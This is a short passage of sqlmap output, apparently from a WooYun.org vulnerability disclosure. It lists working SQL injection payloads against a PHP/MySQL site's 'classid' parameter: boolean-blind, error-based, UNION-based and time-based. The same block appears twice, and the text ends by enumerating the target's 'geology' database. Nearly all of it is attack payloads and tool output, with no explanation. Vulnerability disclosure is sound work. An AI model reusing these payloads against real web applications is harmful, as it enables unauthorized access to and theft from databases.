WooYun.org

Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1568=1568&Nclassid=3
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: classid=1 AND ROW(6358,4656)>(SELECT COUNT(*),CONCAT(0x7161726871,(SELECT (CASE WHEN (6358=6358) THEN 1 ELSE 0 END)),0x7165666971,FLOOR(RAND(0)*2))x FROM (SELECT 3980 UNION SELECT 9873 UNION SELECT 4070 UNION SELECT 2104)a GROUP BY x)&Nclassid=3
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: classid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7161726871,0x45444e6e5249754e4b71,0x7165666971),NULL,NULL,NULL,NULL#&Nclassid=3
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: classid=1 AND 1816=BENCHMARK(5000000,MD5(0x496e614f))&Nclassid=3
---
web application technology: Apache, PHP 5.2.5
back-end DBMS: MySQL 4.1
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=1 AND 1568=1568&Nclassid=3
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: classid=1 AND ROW(6358,4656)>(SELECT COUNT(*),CONCAT(0x7161726871,(SELECT (CASE WHEN (6358=6358) THEN 1 ELSE 0 END)),0x7165666971,FLOOR(RAND(0)*2))x FROM (SELECT 3980 UNION SELECT 9873 UNION SELECT 4070 UNION SELECT 2104)a GROUP BY x)&Nclassid=3
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: classid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7161726871,0x45444e6e5249754e4b71,0x7165666971),NULL,NULL,NULL,NULL#&Nclassid=3
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: classid=1 AND 1816=BENCHMARK(5000000,MD5(0x496e614f))&Nclassid=3
---
web application technology: Apache, PHP 5.2.5
back-end DBMS: MySQL 4.1
available databases [1]:
[*] geology